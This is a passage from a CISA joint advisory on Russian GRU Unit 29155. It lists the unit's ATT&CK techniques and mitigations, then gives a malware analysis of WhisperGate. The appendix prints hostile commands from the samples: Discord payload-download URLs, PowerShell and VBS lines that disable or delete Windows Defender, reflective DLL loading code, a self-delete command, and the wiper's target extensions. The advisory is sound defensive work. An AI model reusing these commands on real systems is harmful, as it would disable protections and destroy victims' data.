data.\r\nObtain Capabilities: Malware | T1588.001 | Unit 29155 cyber actors obtain publicly available malware and malware loaders to support their operations. For example, analysis suggests Raspberry Robin malware may have been used in the role of an access broker.\r\nObtain Capabilities: Exploits | T1588.005 | Unit 29155 cyber actors are known to obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure.\r\nTable 5: Initial Access\r\nTechnique Title | ID | Use\r\nValid Accounts: Default Accounts | T1078.001 | Unit 29155 cyber actors use exploitation scripts to authenticate to IP cameras with default usernames and passwords.\r\nExploit Public-Facing Application | T1190 | Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-26138. The proof of concept exploit for CVE-2022-26134, Through the Wire, has also been used against a victim’s internet-facing Confluence server.\r\nTable 6: Execution\r\nTechnique Title | ID | Use\r\nCommand and Scripting Interpreter: PowerShell | T1059.001 | Unit 29155 cyber actors have used PowerShell to execute commands and other operational tasks.\r\nTable 7: Persistence\r\nTechnique Title | ID | Use\r\nServer Software Component: Web Shell | T1505.003 | Unit 29155 cyber actors use web shells to establish persistent access to systems.\r\nTable 8: Credential Access\r\nTechnique Title | ID | Use\r\nOS Credential Dumping: LSASS Memory | T1003.001 | Unit 29155 cyber actors have exfiltrated LSASS memory dumps to retrieve credentials from victim machines.\r\nOS Credential Dumping: Security Account Manager | T1003.002 | Unit 29155 cyber actors have exfiltrated usernames and hashed passwords from the SAM.\r\nBrute Force: Password Spraying | T1110.003 | Unit 29155 cyber actors targeted victims’ Microsoft OWA infrastructure with password spraying to obtain valid usernames and passwords.\r\nUnsecured Credentials: Credentials in Files | T1552.001 | Following exploitation of vulnerable IP cameras, Unit 29155 cyber actors dump configuration settings and credentials in plaintext.\r\nTable 9: Discovery\r\nTechnique Title | ID | Use\r\nNetwork Service Discovery | T1046 | Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the NSE) to write custom scripts for discovering and scanning other machines.\r\nLog Enumeration | T1654 | Unit 29155 cyber actors have enumerated and exfiltrated SECURITY and SYSTEM logs.\r\nTable 10: Lateral Movement\r\nTechnique Title | ID | Use\r\nUse Alternate Authentication Material: Pass the Hash | T1550.002 | Unit 29155 cyber actors used Pass-the-Hash to authenticate via SMB.\r\nTable 11: Collection\r\nTechnique Title | ID | Use\r\nEmail Collection | T1114 | Unit 29155 cyber actors have used their infrastructure to compromise multiple victims’ mail servers and exfiltrate mail artifacts, such as email messages.\r\nVideo Capture | T1125 | Unit 29155 cyber actors have exploited IoT devices, specifically IP cameras with default usernames and passwords, and exfiltrated images.\r\nData from Information Repositories: Confluence | T1213.001 | Unit 29155 cyber actors leveraged Through the Wire against the victim’s internet-facing Confluence server.\r\nArchive Collected Data | T1560 | Unit 29155 cyber actors compress victim data (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure.\r\nTable 12: Command and Control\r\nTechnique Title | ID | Use\r\nProxy: Multi-hop Proxy | T1090.003 | Unit 29155 cyber actors executed commands via ProxyChains, a tool used to route internal traffic through a series of proxies. ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports.\r\nApplication Layer Protocol: Web Protocols | T1071.001 | Unit 29155 cyber actors use POST requests over HTTP to send payloads to victims.\r\nApplication Layer Protocol: DNS | T1071.004 | Unit 29155 cyber actors used DNS tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic.\r\nNon-Application Layer Protocol | T1095 | Unit 29155 cyber actors commonly use a reverse TCP connection to initiate communication with their infrastructure.\r\nIngress Tool Transfer | T1105 | When an exploit is successfully executed on a victim system, Unit 29155 cyber actors are known to launch the Meterpreter payload to initiate communication with their actor-controlled systems.\r\nProtocol Tunneling | T1572 | Unit 29155 cyber actors have used infrastructure configured with OpenVPN to tunnel traffic over a single port (1194), as well as VPNs and GOST, to anonymize their operational activity.\r\nTable 13: Exfiltration\r\nTechnique Title | ID | Use\r\nExfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Unit 29155 cyber actors exfiltrated data to the cloud storage and file hosting service, MEGA (mega[.]nz), using Rclone.\r\nTable 14: Impact\r\nTechnique Title | ID | Use\r\nData Destruction | T1485 | Unit 29155 cyber actors’ objectives include the destruction of data.\r\nMitigations\r\nThe authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.\r\nLimit Adversarial Use of Common Vulnerabilities\r\nPrioritize patching according to CISA’s Known Exploited Vulnerabilities Catalog, especially for CVEs identified in this advisory, and then critical and high vulnerabilities that allow for remote code execution on internet-facing devices. Conduct regular automated vulnerability scans to perform vulnerability assessments on all network resources based on threat actor behaviors and known exploitable vulnerabilities (CISA CPG 1.E).\r\nLimit exploitable services on internet-facing assets, such as email and remote management protocols (CISA CPGs 2.M, 2.W). Where necessary services must be exposed, such as services hosted in a demilitarized zone (DMZ), implement the appropriate compensatory controls to prevent common forms of abuse and exploitation. Disable all unnecessary operating system applications and network protocols to combat adversary enumeration. For additional guidance, see CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems.\r\nU.S. 
organizations can utilize a range of CISA services at no cost, including vulnerability scanning and testing,\r\nto help organizations reduce exposure to threats. CISA Cyber Hygiene services can provide additional review of\r\ninternet-accessible assets and provide regular reports on steps to take to mitigate vulnerabilities. Email\r\nvulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services,” to get started.\r\nSoftware manufacturers, vendors, and consumers are encouraged to review CISA and NIST’s Defending Against\r\nSupply Chain Attacks. This publication provides an overview of software supply chain risks and recommendations\r\nfor how software customers and vendors can use the NIST Cyber Supply Chain Risk Management (C-SCRM)\r\nFramework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate software\r\nsupply chain risks. CISA recommends comprehensive mitigations for supply chain incident reporting, vulnerability\r\ndisclosing (e.g., security.txt), and choosing a trusted supplier or vendor that observes proper cyber security hygiene\r\n(CISA CPG 1.G, 1.H, 1.I) to defend against upstream attacks.\r\nDeploy Protective Controls and Architecture\r\nImplement network segmentation. Network segmentation can help prevent lateral movement by controlling traffic\r\nflows between—and access to—various subnetworks (CISA CPG 2.F). Best practice mitigations include updating\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 9 of 20\n\nIdentity and Access Management (IAM) and employing phishing-resistant MFA for all devices and accounts\r\nidentified as organizational assets. For additional guidance, see CISA and NSA’s IAM Recommended Best Practices\r\nGuide for Administrators (CISA CPG 2.H).\r\nVerify and ensure that sensitive data, including credentials, are not stored in plaintext and can only be\r\naccessed by authenticated and authorized users. 
Credentials must be stored in a secure manner, such as with a\r\ncredential/password manager to protect from malicious enumeration (CISA CPG 2.L).\r\nDisable and/or restrict use of command line and PowerShell activity. Update to the latest version and uninstall all\r\nearlier PowerShell versions (CISA CPG 2.N).\r\nImplement a continuous system monitoring program, such as security information and event management\r\n(SIEM) or endpoint detection and response (EDR) solutions, to comprehensively log and review all authorized\r\nexternal access connections. This logging will better ensure the prompt detection of misuse or abnormal activity\r\n(CISA CPG 2.T).\r\nMonitor for unauthorized access attempts and programming anomalies through comprehensive logging that is\r\nsecured from modification, such as limiting permissions and adding redundant remote logging (CISA CPG 2.U).\r\nSecurity appliances should be set to detect and/or block Impacket framework indicators, PSExec or WMI commands,\r\nand suspicious PowerShell commands for timely identification and remediation.\r\nIdentify any use of outdated or weak encryption, update these to sufficiently strong algorithms, and consider the\r\nimplications of post-quantum cryptography (CISA CPG 2.K). Use properly configured and up-to-date Secure Socket\r\nLayer (SSL)/Transport Layer Security (TLS) to protect data in transit.\r\nSecurity Controls\r\nIn addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's\r\nsecurity program against the threat behaviors mapped to the MITRE ATT\u0026CK for Enterprise framework in this advisory.\r\nThe authoring agencies recommend testing your existing security controls inventory to assess how they perform against the\r\nATT\u0026CK techniques described in this advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (see Table 3 to Table 14).\r\n2. 
Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\n4. Analyze your detection and prevention technologies’ performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. Tune your security program, including people, processes, and technologies, based on the data generated by this\r\nprocess.\r\nThe authoring agencies recommend continually testing your security program, at scale, in a production environment to\r\nensure optimal performance against the MITRE ATT\u0026CK techniques identified in this advisory.\r\nResources\r\nMITRE: WhisperGate\r\nCISA AA22-057A: Destructive Malware Targeting Organizations in Ukraine\r\nDOJ Press Release: Russian National Charged for Conspiring with Russian Military Intelligence to Destroy\r\nUkrainian Government Computer Systems and Data\r\nFBI: Cyber Crime\r\nCISA: Russia Cyber Threat Overview and Advisories\r\nMITRE: Group G1003 - Ember Bear\r\nMITRE: Impacket\r\nNIST NVD: CVE-2020-1472\r\nNIST NVD: CVE-2021-26084\r\nNIST NVD: CVE-2021-3156\r\nNIST NVD: CVE-2021-4034\r\nNIST NVD: CVE-2022-27666\r\nNIST NVD: CVE-2021-33044\r\nNIST NVD: CVE-2021-33045\r\nNIST NVD: CVE-2022-26134\r\nNIST NVD: CVE-2022-26138\r\nNIST NVD: CVE-2022-3236\r\nMITRE: BloodHound\r\nMITRE: Rclone\r\nMITRE: P.A.S. Webshell\r\nCISA: Known Exploited Vulnerabilities Catalog\r\nCISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 10 of 20\n\nCISA, NIST: Defending Against Supply Chain Attacks\r\nCISA, NSA: IAM Recommended Best Practices Guide for Administrators\r\nReferences\r\n1. Microsoft Threat Intelligence Center: Destructive Malware Targeting Ukrainian Organizations\r\n2. Microsoft Threat Intelligence Center: Cadet Blizzard Emerges as a Novel and Distinct Russian Threat Actor\r\n3. CrowdStrike: EMBER BEAR Threat Actor Profile\r\n4. 
Mandiant Threat Intelligence: Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation\r\n5. SentinelOne: Threat Actor UAC-0056 Targeting Ukraine with Fake Translation Software\r\n6. Introduction to Acunetix\r\n7. GitHub: OWASP Amass\r\n8. Kali Linux Tutorials: Droopescan\r\n9. GitHub: OWASP JoomScan\r\n10. Kali.org: MASSCAN\r\n11. DigitalOcean: How To Use Netcat to Establish and Test TCP and UDP Connections\r\n12. Shodan: What is Shodan?\r\n13. VirusTotal: How it Works\r\n14. GitHub: Through the Wire\r\n15. Confluence Security Advisory: Confluence Server and Data Center - CVE-2022-26134\r\n16. Microsoft: Security Bulletin MS17-010\r\n17. Avast: What is EternalBlue and Why is the MS17-010 Exploit Still Relevant?\r\n18. Palo Alto Networks Unit 42: Threat Brief - Ongoing Russia and Ukraine Cyber Activity\r\n19. CERT-UA#3799 Report\r\n20. Bellingcat: Attack on Ukrainian Government Websites Linked to GRU Hackers\r\n21. Trend Micro: Cyberattacks are Prominent in the Russia-Ukraine Conflict\r\nContact Information\r\nTo report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local\r\nFBI field office or CISA’s 24/7 Operations Center at contact@mail.cisa.dhs.gov or (888) 282-0870. When available,\r\nplease include the following information regarding the incident: date, time, and location of the incident; type of activity;\r\nnumber of people affected; type of equipment used for the activity; the name of the submitting company or organization; and\r\na designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact\r\nCybersecurity_Requests@nsa.gov .\r\nDisclaimer\r\nThe information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do\r\nnot endorse any commercial entity, product, company, or service, including any entities, products, or services linked within\r\nthis document. 
Any reference to specific commercial entities, products, processes, or services by service mark, trademark,\r\nmanufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the\r\nauthoring agencies.\r\nVersion History\r\nSeptember 5, 2024: Initial version.\r\nAppendix A: WhisperGate Malware Analysis\r\nOverview\r\nThis technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim\r\nand analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password\r\ncompromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin\r\nAmerica and Central Asia.\r\nUnit 29155 cyber actors’ use of WhisperGate involved the deployment of the malware files, stage1.exe and stage2.exe.\r\nWhisperGate runs in two stages that corrupt a system’s master boot record, display a fake ransomware note, and encrypt files\r\nbased on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files,\r\nincluding what appears to be development versions or iterations of the binaries. Discord is commonly leveraged by threat\r\nactors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection\r\nchain by directly sharing files through its platform. In the case of stage2.exe, the binary communicated with Discord to\r\nobtain Tbopbh.jpg, the malicious payload that is loaded in memory and performs the destructive capabilities.[18]\r\nCategorization\r\nThe Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as\r\nClusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. 
These groupings are based\r\non analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following\r\nsections include notable details found within each cluster.\r\nCluster 1\r\nCluster 1 contained the following files:\r\nhxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg (a resource,\r\ne.g., payload, for stage2.exe)[18 ]\r\nsaint.exe (a downloader, SaintBot , as detailed by CERT-UA)[19 ]\r\nputtyjejfrwu.exe [19 ]\r\nCluster 2\r\nCluster 2 contained:\r\nhxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip\r\n(means for sending malware in over 35 different zip files via Discord links)[20 ]\r\nSeveral Microsoft Word documents with macros that download test01.exe from 3237.site . Once executed,\r\ntest01.exe downloads load2022.exe from smm2021.net .\r\nCluster 3\r\nCluster 3 contained:\r\nhxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe (Note: Unit\r\n29155 cyber actors’ use of Client.exe was confirmed as linked to the activity, but the file was not obtained for\r\nanalysis and functionality cannot be confirmed.)\r\nasd.exe (likely a development version of stage1.exe )\r\nBehavioral Analysis\r\nTwo Windows Portable Executable (PE) files ( stage1.exe and stage2.exe ) were obtained from the Ukrainian victim for\r\nanalysis. One PE file ( asd.exe ) was obtained from a U.S. victim.\r\nstage1.exe\r\nstage1.exe was obtained from the C:\\ path of the Ukrainian victim’s Windows machine. stage1.exe executes when the\r\ninfected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting\r\nnormally. 
Table 15 lists the hashes and properties attributed to stage1.exe .\r\nTable 15: stage1.exe Properties\r\nMD5 5d5c99a08a7d927346ca2dafa7973fc1\r\nSHA-256 a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92\r\nCompiler MinGW(GCC: (GNU) 6.3.0)[-]\r\nLinker GNU linker Id (GNU Binutils)(2.28)[GUI32]\r\nTimeDateStamp 2022-01-10 05:37:18\r\nExecution\r\nMessage\r\nYour hard drive has been corrupted. In case you want to recover all hard drives of your organization, You\r\nshould pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via\r\ntox ID\r\n8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65\r\nwith your organization name. We will contact you to give further instructions.\r\nTable 16: asd.exe Properties\r\nMD5 eac0ae655d344c25ff467a929790885c\r\nSHA-256 b9e64b58d7746cb1d3bed20405ef34d097af08c809d8dad10b9296b0bebb2b0b\r\nCompiler MinGW(GCC: (GNU) 6.3.0)[-]\r\nLinker GNU linker Id (GNU Binutils)(2.28)[Console32,console]\r\nTimeDateStamp 1969-12-31 19:00:00\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 12 of 20\n\nasd.exe is likely a development version of stage1.exe . While the behavior of asd.exe is similar to stage1.exe , the\r\nmessages displayed were different.\r\nstage2.exe\r\nstage2.exe was obtained from the C:\\ path of the Ukrainian victim’s Windows machine. 
Table 17 lists the hashes and\r\nproperties attributed to stage2.exe .\r\nTable 17: stage2.exe Properties\r\nMD5 764f691b2168e8b3b6f9fb6582e2f819\r\nSHA-256 aa79afbf82b06cda268664b7c83900d8f7a33e0f0071facba0b3d8f7a68ce56a\r\nLibrary .NET(v4.0.30319)[-]\r\nLinker Microsoft Linker(6.0)(GUI32,signed)\r\nTimeDateStamp 2022-01-10 09:39:54\r\nTable 18 lists the following chronological observations when stage2.exe executes.\r\nTable 18: stage2.exe Behavioral Analysis Observations\r\nEvent Victim Observation\r\nPowerShell command executed\r\ntwice\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" –enc\r\nUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==\r\nBase64 UTF-16LE string\r\ndecoded\r\nStart-Sleep -s 10\r\nHTTP GET request sent to\r\nDiscord URL to download\r\nTbopbh.jpg\r\nhxxp://cdn.discordapp.com/attachments/\r\n928503440139771947/930108637681184768/Tbopbh[.]jpg\r\nNmddfrqqrbyjeygggda.vbs\r\ncreated and executed within\r\nthe %TEMP% directory\r\nThe Visual Basic Script (VBS) file contained the following command:\r\nCreateObject(“WScript.Shell”).Run “powershell Set-MpPreference -\r\nExclusionPath ‘C:\\’”, 0, False\r\nAdvancedRun.exe created and\r\nexecuted twice\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\AdvancedRun.exe” /EXEFilename\r\n“C:\\Windows\\System32\\sc.exe” /WindowState 0 /CommandLine “stop WinDefend”\r\n/StartDirectory “” /RunAs 8 /Run\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\AdvancedRun.exe” /EXEFilename\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” /WindowState 0\r\n/CommandLine “rmdir ‘C:\\ProgramData\\Microsoft\\Windows Defender’ –Recurse”\r\n/StartDirectory “” /RunAs 8 /Run\r\nInstallUtil.exe created and\r\nexecuted; files corrupted\r\nfollowing execution\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\InstallUtil.exe\r\nStatic Analysis\r\nStatic analysis was further conducted on two files ( stage2.exe , Tbopbh.jpg ) to uncover additional malware functionality\r\nand 
attributes.\r\nstage2.exe\r\nStatic analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the\r\nMD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in\r\nTable 17). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior.\r\nTable 19: stage2.exe Variant Properties\r\nMD5 14c8482f302b5e81e3fa1b18a509289d\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 13 of 20\n\nSHA-256 dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78\r\nLibrary .NET(v4.0.30319)[-]\r\nLinker Microsoft Linker(6.0)(GUI32,signed)\r\nTimeDateStamp 2022-01-10 09:39:54\r\nThis variant of stage2.exe contained multiple layers of execution:\r\nstage2.exe contained a WebClient object that was initialized with Discord URL\r\nhxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg to obtain the\r\npayload Tbopbh.jpg .\r\nstage2.exe contained logic to reverse file bytes of a file using the Array’s Reverse method.\r\nstage2.exe contained logic to load an Assembly object into a Stream object.\r\nstage2.exe used the reflection library to call method Ylfwdwgmpilzyaph from the loaded Assembly object.\r\nstage2.exe contained decryption logic that resembled RC4, a C# class produced a base64 string and an encryption\r\nclass which created a key using the decoded string. The encryption class used encryption logic every 32 bytes to\r\ndecrypt. Additionally, the XOR functionality occurred using the initialized byte “Array” shown below. The\r\nencryption class resembled RC4; it was used every 32 bytes. 
The base64 string came from a class that contained\r\nEazFuscator logic to obfuscate code by eliminating control flow within code, as well as making symbols difficult to\r\nanalyze:\r\nbyte[] array = new byte[] {148, 68, 208, 52, 241, 93, 195, 220};\r\nstage2.exe contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the\r\nfull strings would have been obfuscated and further segmented when viewed statically. The following is an example\r\nof a built string:\r\nUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==\r\nWhen the above string was base64 decoded, the system displayed the following PowerShell command: Start-Sleep\r\n-s 10\r\nstage2.exe served as the downloader and driver logic for the malware payload, Tbopbh.jpg .\r\nTbopbh.jpg (payload for stage2.exe variant)\r\nAn account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:\r\nMD5: b3370eb3c5ef6c536195b3bea0120929\r\nSHA-256: 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6\r\nWhen viewing payload Tbopbh.jpg using a hex editor, it ended with value “ZM” or hex values “5A 4D”—this indicated\r\nthe payload was a reversed PE. 
Reversing the bytes of Tbopbh.jpg revealed the hashes of the resulting payload listed in\r\nTable 20 below.\r\nTable 20: Tbopbh.jpg Properties\r\nMD5 e61518ae9454a563b8f842286bbdb87b\r\nSHA-256 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d\r\nProtector Eazfuscator(-)[-]\r\nLibrary .NET(v4.0.30319)[-]\r\nLinker Microsoft Linker(6.0)[DLL32]\r\nTimeDateStamp 2022-01-10 09:39:31\r\nThe original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll ; its\r\nattributes are listed in Table 21:\r\nTable 21: Frkmlkdkdubkznbkmcf.dll Attributes\r\nResources Classes Methods \r\n\\u2005 \\u2005 \\u2009 \\u2008 \\u2001 \\u2007 \\u2009 \\u200b\r\n\\u200a \\u2005\r\nNote: This format annotates action taken by EazFuscator to\r\nobfuscate items, making it difficult for malware analysts to\r\nreview.\r\nMain - ClassLibrary1 \\u0002\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 14 of 20\n\nResources Classes Methods\n7c8cb5598e724d34384cce7402b11f0e\npc1eOx2WJVV1579235895\n–\nYlfwdwgmpilzyaph\n78c855a088924e92a7f60d661c3d1845\nstage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource\n78c855a088924e92a7f60d661c3d1845 . 
The reflection library was used to execute method Ylfwdwgmpilzyaph, as shown in\nthe following C# code block:\nusing System;\nusing System.IO;\nusing System.Reflection;\n// Resolve the DLL path and load the assembly from disk\nstring path = \"Frkmlkdkdubkznbkmcf.dll\";\nstring fqpn = Path.GetFullPath(path);\nAssembly assembly = Assembly.LoadFile(fqpn);\n// Locate the obfuscated entry class and invoke its static method by name\nType type = assembly.GetType(\"ClassLibrary1.Main\");\ntype.InvokeMember(\"Ylfwdwgmpilzyaph\", BindingFlags.InvokeMethod, null, null, null);\nThe following application configuration accompanied the above code block to allow loading from remote sources:\n\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\nUpon invoking the method Ylfwdwgmpilzyaph, Nmddfrqqrbyjeygggda.vbs was written to the Windows %TEMP% directory; its\nattributes are listed in Table 22 below.\nTable 22: Nmddfrqqrbyjeygggda.vbs Attributes\nMD5 6eed4ee0cc57126e9a096ab9905f471c\nSHA-256 db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f\nVBS Code CreateObject(\"WScript.Shell\").Run \"powershell Set-MpPreference -ExclusionPath 'C:\\'\", 0, False\nThe VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell\ncommand to exclude the C:\\ drive from Windows Defender's security checks. Malware analysts decoded and decrypted one\nof the resources from Frkmlkdkdubkznbkmcf.dll ( 78c855a088924e92a7f60d661c3d1845 ). 
Further analysis of\nFrkmlkdkdubkznbkmcf.dll resulted in an additional DLL file with the following hashes:\nMD5: 5a537673c34933fc854fbfb65477a686\nSHA-256: 35feefe6bd2b982cb1a5d4c1d094e8665c51752d0a6f7e3cae546d770c280f3a\nThis decrypted DLL file contained two resources, AdvancedRun and Waqybg .\nAdvancedRun (GZIP)\nMD5: de85ca91e1e8100a619de1c25112f1a5\nSHA-256: 489ab4819830d231c3fc3572c5386cad9d18773a8121373ea8174de981cc9166\nWaqybg (GZIP)\nReversed byte order:\nMD5: 9b1191f1ceddf312b0d609cd929c6631\nSHA-256: 0dd61a16c625c49ffefaf4ce24cabf9a074028a06640d9bbb804f735ff56dfa3\nOriginal byte order:\nMD5: 29d83f29c0b0a0b7499e71e7d5cb713f\nSHA-256: fd4a5398e55beacb2315687a75af5aa15b776b5d36b9800a1792ede3955616c2\nTable 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed files.\nTable 23: AdvancedRun (decompressed)\nType Win32 EXE\nCompany NirSoft\nTimeStamp 2020:08:03 09:41:38-04:00\nOriginal File Name AdvancedRun.exe\nMD5 17fc12902f4769af3a9271eb4e2dacce\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\nPage 15 of 20\n\nSHA-256 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b\r\nTable 24: Waqybg (reversed; decompressed)\r\nType Win32 EXE\r\nTimeStamp 2022:01:10 03:14:38-05:00\r\nMD5 3907c7fbd4148395284d8e6e3c1dba5d\r\nSHA-256 34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907\r\nCompiler MinGW(GCC: (GNU) 6.3.0)[-]\r\nLinker GNU linker Id (GNU Binutils)(2.28)[Console32,console]\r\nThe reversed and decompressed Waqybg files contained file corruption logic along with a final command to ping arbitrarily\r\nand delete itself: cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 \u003e Nul \u0026 Del /f /q “%s” . 
Waqybg is known as\r\nWhisperKill—a malware downloaded by WhisperGate that destroys files with specific extensions.[19 ],[21 ]\r\nThe following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the “wcscmp” C\r\nfunction logic (a string compare function). The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc\r\nvalues per targeted file.\r\nTable 25: File Extensions Targeted by WhisperKill\r\nu\".3DM\" u\".3DS\" u\".602\" u\".ACCDB\" u\".ARC\" u\".ASC\"\r\nu\".ASM\" u\".ASP\" u\".ASPX\" u\".BACKUP\" u\".BAK\" u\".BAT\"\r\nu\".BMP\" u\".BRD\" u\".BZ2\" u\".CGM\" u\".CLASS\" u\".CMD\"\r\nu\".CONFIG\" u\".CPP\" u\".CRT\" u\".CSR\" u\".CSV\" u\".DBF\"\r\nu\".DCH\" u\".DER\" u\".DIF\" u\".DIP\" u\".DJVU.SH\" u\".DOC\"\r\nu\".DOCB\" u\".DOCM\" u\".DOCM\" u\".DOCX\" u\".DOT\" u\".DOTM\"\r\nu\".DOTX\" u\".DWG\" u\".EDB\" u\".EML\" u\".FRM\" u\".GIF\"\r\nu\".HDD\" u\".HTM\" u\".HWP\" u\".IBD\" u\".INC\" u\".INI\"\r\nu\".ISO\" u\".JAR\" u\".JAVA\" u\".JPEG\" u\".JPG\" u\".JSP\"\r\nu\".KDBX\" u\".KEY\" u\".LAY\" u\".LAY6\" u\".LDF\" u\".LOG\"\r\nu\".MAX\" u\".MDB\" u\".MDF\" u\".MML\" u\".MSG\" u\".MYD\"\r\nu\".MYI\" u\".NEF\" u\".NVRAM\" u\".ODB\" u\".ODG\" u\".ODP\"\r\nu\".ODS\" u\".ODT\" u\".OGG\" u\".ONETOC2\" u\".OST\" u\".OTG\"\r\nu\".OTP\" u\".OTS\" u\".OTT\" u\".P12\" u\".PAQ\" u\".PAS\"\r\nu\".PDF\" u\".PEM\" u\".PFX\" u\".PHP\" u\".PHP3\" u\".PHP4\"\r\nu\".PHP5\" u\".PHP6\" u\".PHP7\" u\".PHPS\" u\".PHTML\" u\".PNG\"\r\nu\".POT\" u\".POTM\" u\".POTX\" u\".PPAM\" u\".PPK\" u\".PPS\"\r\nu\".PPSM\" u\".PPSX\" u\".PPT\" u\".PPTM\" u\".PPTM\" u\".PPTX\"\r\nu\".PS1\" u\".PSD\" u\".PST\" u\".RAR\" u\".RAW\" u\".RTF\"\r\nu\".SAV\" u\".SCH\" u\".SHTML\" u\".SLDM\" u\".SLDX\" u\".SLK\"\r\nu\".SLN\" u\".SNT\" u\".SQ3\" u\".SQL\" u\".SQLITE3\" u\".SQLITEDB\"\r\nu\".STC\" u\".STD\" u\".STI\" u\".STW\" u\".SUO\" u\".SVG\"\r\nu\".SXC\" u\".SXD\" u\".SXI\" u\".SXM\" u\".SXW\" u\".TAR\"\r\nu\".TBK\" u\".TGZ\" u\".TIF\" 
